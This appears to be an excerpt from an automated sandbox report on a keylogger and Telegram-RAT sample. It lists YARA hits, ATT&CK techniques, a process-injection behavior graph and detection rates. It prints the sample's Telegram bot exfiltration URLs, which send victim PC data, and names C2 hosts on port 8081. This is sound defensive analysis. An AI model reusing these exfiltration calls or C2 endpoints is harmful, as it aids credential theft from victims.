                  Source: demonetised.exeBinary or memory string: WIN_81
                  Source: demonetised.exeBinary or memory string: WIN_XP
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                  Source: demonetised.exeBinary or memory string: WIN_XPe
                  Source: demonetised.exeBinary or memory string: WIN_VISTA
                  Source: demonetised.exeBinary or memory string: WIN_7
                  Source: demonetised.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E38C4F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E3923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E3923B
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00D78C4F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00D7923B

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		3
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		31
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		11
                  Software Packing                  		NTDS137
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets251
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                  Process Injection                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587603 Sample: B7N48hmO78.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 10 other signatures 2->52 8 B7N48hmO78.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...\demonetised.exe, PE32 8->26 dropped 60 Binary is likely a compiled AutoIt script file 8->60 14 demonetised.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 demonetised.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\demonetised.vbs, data 14->28 dropped 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 68 Machine Learning detection for dropped file 14->68 74 2 other signatures 14->74 20 svchost.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 svchost.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49704, 49707, 49709 UTMEMUS United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49722, 49812 TELEGRAMRU United Kingdom 20->38 40 reallyfreegeoip.org 104.21.32.1, 443, 49705, 49706 CLOUDFLARENETUS United States 20->40 54 System process connects to network (likely due to code injection or exploit) 24->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  B7N48hmO78.exe73%VirustotalBrowse
                  B7N48hmO78.exe79%ReversingLabsWin32.Trojan.AutoitInject
                  B7N48hmO78.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\inhumate\demonetised.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\inhumate\demonetised.exe79%ReversingLabsWin32.Trojan.AutoitInject
                  C:\Users\user\AppData\Local\inhumate\demonetised.exe73%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.32.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/svchost.exe, 00000006.00000002.4525232764.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20asvchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabsvchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgsvchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botsvchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://chrome.google.com/webstore?hl=enhZsvchost.exe, 00000003.00000002.4524898032.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.office.com/lBsvchost.exe, 00000003.00000002.4524898032.0000000005477000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.orgsvchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=ensvchost.exe, 00000006.00000002.4525232764.000000000531D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://varders.kozow.com:8081svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://anotherarmy.dns.army:8081svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                        		high
